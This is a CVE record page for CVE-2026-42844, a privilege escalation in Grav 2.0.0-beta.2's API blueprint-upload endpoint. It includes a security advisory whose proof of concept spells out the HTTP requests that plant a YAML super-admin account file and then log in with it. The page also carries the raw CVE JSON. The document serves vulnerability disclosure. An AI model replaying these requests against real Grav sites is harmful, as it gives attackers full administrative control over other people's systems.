← Back
2026-05-12 21:43CVE-2026-42844GitHub_M
PUBLISHED5.2CWE-434CWE-269

Grav: Low-privileged API users can create super-admin accounts via blueprint-upload

Grav is a file-based Web platform. In Grav 2.0.0-beta.2, a low-privileged authenticated API user with api.media.write can abuse /api/v1/blueprint-upload to write an arbitrary YAML file into user/accounts/, then log in as the newly created account with api.super privileges. This results in full administrative compromise of the Grav API. This vulnerability is fixed in API 1.0.0-beta.17.

Problem type

Affected products

getgrav

grav

2.0.0-beta.2 - AFFECTED

References

https://github.com/getgrav/grav/security/advisories/GHSA-6xx2-m8wv-756h

https://github.com/getgrav/grav/security/advisories/GHSA-6xx2-m8wv-756h

x_refsource_CONFIRM

GitHub Security Advisories

GHSA-6xx2-m8wv-756h

Low-privileged Grav API users can create super-admin accounts via blueprint-upload

https://github.com/advisories/GHSA-6xx2-m8wv-756h

Summary

In Grav 2.0.0-beta.2, a low-privileged authenticated API user with api.media.write can abuse /api/v1/blueprint-upload to write an arbitrary YAML file into user/accounts/, then log in as the newly created account with api.super privileges.

This results in full administrative compromise of the Grav API.

Details

The vulnerability is located in the API plugin's blueprint upload flow:

  • user/plugins/api/classes/Api/ApiRouter.php:261
  • user/plugins/api/classes/Api/Controllers/BlueprintUploadController.php:32-45
  • user/plugins/api/classes/Api/Controllers/BlueprintUploadController.php:102-114
  • user/plugins/api/classes/Api/Controllers/BlueprintUploadController.php:271-308
  • user/plugins/api/classes/Api/Controllers/BlueprintUploadController.php:407-417
  • user/plugins/api/classes/Api/Controllers/AuthController.php:41-55

The issue exists because /api/v1/blueprint-upload accepts caller-controlled destination and scope values and uses them to resolve the final filesystem write target.

When the request uses:

  • destination=self@:
  • scope=users/anything

The server resolves the write target to the shared account directory:

user/accounts/

The upload handler then writes the supplied file directly into that directory and does not block YAML account files. Because Grav accepts account YAML files and supports a plaintext password: field on first login, an attacker can create a fully functional administrator account with api.super.

The required attacker privilege is low:

access:
  api:
    access: true
    media:
      write: true

PoC

Step 1: Authenticate as the low-privileged API user

POST /api/v1/auth/token HTTP/1.1
Host: 127.0.0.1:8123
Content-Type: application/json
Connection: close

{"username":"uploader","password":"Upload123A"}

Extract:

UPLOADER_TOKEN = <access_token from response>

Attachment:

Step 2: Upload a malicious account YAML file

POST /api/v1/blueprint-upload HTTP/1.1
Host: 127.0.0.1:8123
X-API-Token: <UPLOADER_TOKEN>
Content-Type: multipart/form-data; boundary=----CodexBoundaryF01
Connection: close

------CodexBoundaryF01
Content-Disposition: form-data; name="destination"

self@:
------CodexBoundaryF01
Content-Disposition: form-data; name="scope"

users/anything
------CodexBoundaryF01
Content-Disposition: form-data; name="file"; filename="pwned.yaml"
Content-Type: text/yaml

email: attacker@example.com
fullname: attacker
title: Site Administrator
state: enabled
password: Passw0rd!123
access:
  site:
    login: true
  api:
    super: true
------CodexBoundaryF01--

Expected result:

{
  "data": [
    {
      "name": "pwned.yaml",
      "path": "user/accounts/pwned.yaml"
    }
  ]
}

Attachment:

Step 3: Log in as the newly created account

POST /api/v1/auth/token HTTP/1.1
Host: 127.0.0.1:8123
Content-Type: application/json
Connection: close

{"username":"pwned","password":"Passw0rd!123"}

Expected result:

{
  "data": {
    "user": {
      "username": "pwned",
      "super_admin": true
    }
  }
}

Attachment:

Step 4: Verify privileged API access

GET /api/v1/system/info HTTP/1.1
Host: 127.0.0.1:8123
X-API-Token: <PWNED_TOKEN>
Connection: close

Expected result:

The request succeeds and returns system-level information.

Attachment:

Impact

This is an authenticated vertical privilege-escalation vulnerability.

Any API user with basic media upload capability can escalate directly to a full API super administrator by planting a new account YAML file. Once api.super access is obtained, the attacker gains full control over the CMS management API and can:

  • modify content
  • alter configuration
  • manage users
  • install or update plugins/themes
  • access system-level administration features

In a real deployment, this level of control is sufficient for complete CMS compromise and may be chained into server-side code execution depending on enabled plugins, writable template paths, or package-management workflow.

This issue was reproduced locally:

  • the upload response returned user/accounts/pwned.yaml
  • logging in as pwned succeeded
  • the new account had super_admin = true
  • privileged endpoints such as /api/v1/system/info were accessible
github.com

https://github.com/getgrav/grav/security/advisories/GHSA-6xx2-m8wv-756h

github.com

https://github.com/getgrav/grav-plugin-api/commit/97fc02844a35f743dfe93d34efd92d47eedd5bc5

nvd.nist.gov

https://nvd.nist.gov/vuln/detail/CVE-2026-42844

github.com

https://github.com/advisories/GHSA-6xx2-m8wv-756h

JSON source

https://cveawg.mitre.org/api/cve/CVE-2026-42844
Click to expand
{
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "cveMetadata": {
    "cveId": "CVE-2026-42844",
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "dateUpdated": "2026-05-12T21:43:18.259Z",
    "dateReserved": "2026-04-30T16:44:48.376Z",
    "datePublished": "2026-05-12T21:43:18.259Z",
    "state": "PUBLISHED"
  },
  "containers": {
    "cna": {
      "providerMetadata": {
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M",
        "dateUpdated": "2026-05-12T21:43:18.259Z"
      },
      "title": "Grav: Low-privileged API users can create super-admin accounts via blueprint-upload",
      "descriptions": [
        {
          "lang": "en",
          "value": "Grav is a file-based Web platform. In Grav 2.0.0-beta.2, a low-privileged authenticated API user with api.media.write can abuse /api/v1/blueprint-upload to write an arbitrary YAML file into user/accounts/, then log in as the newly created account with api.super privileges. This results in full administrative compromise of the Grav API. This vulnerability is fixed in API 1.0.0-beta.17."
        }
      ],
      "affected": [
        {
          "vendor": "getgrav",
          "product": "grav",
          "versions": [
            {
              "version": "2.0.0-beta.2",
              "status": "affected"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "lang": "en",
              "description": "CWE-434: Unrestricted Upload of File with Dangerous Type",
              "cweId": "CWE-434",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "lang": "en",
              "description": "CWE-269: Improper Privilege Management",
              "cweId": "CWE-269",
              "type": "CWE"
            }
          ]
        }
      ],
      "references": [
        {
          "url": "https://github.com/getgrav/grav/security/advisories/GHSA-6xx2-m8wv-756h",
          "name": "https://github.com/getgrav/grav/security/advisories/GHSA-6xx2-m8wv-756h",
          "tags": [
            "x_refsource_CONFIRM"
          ]
        }
      ],
      "metrics": [
        {}
      ]
    }
  }
}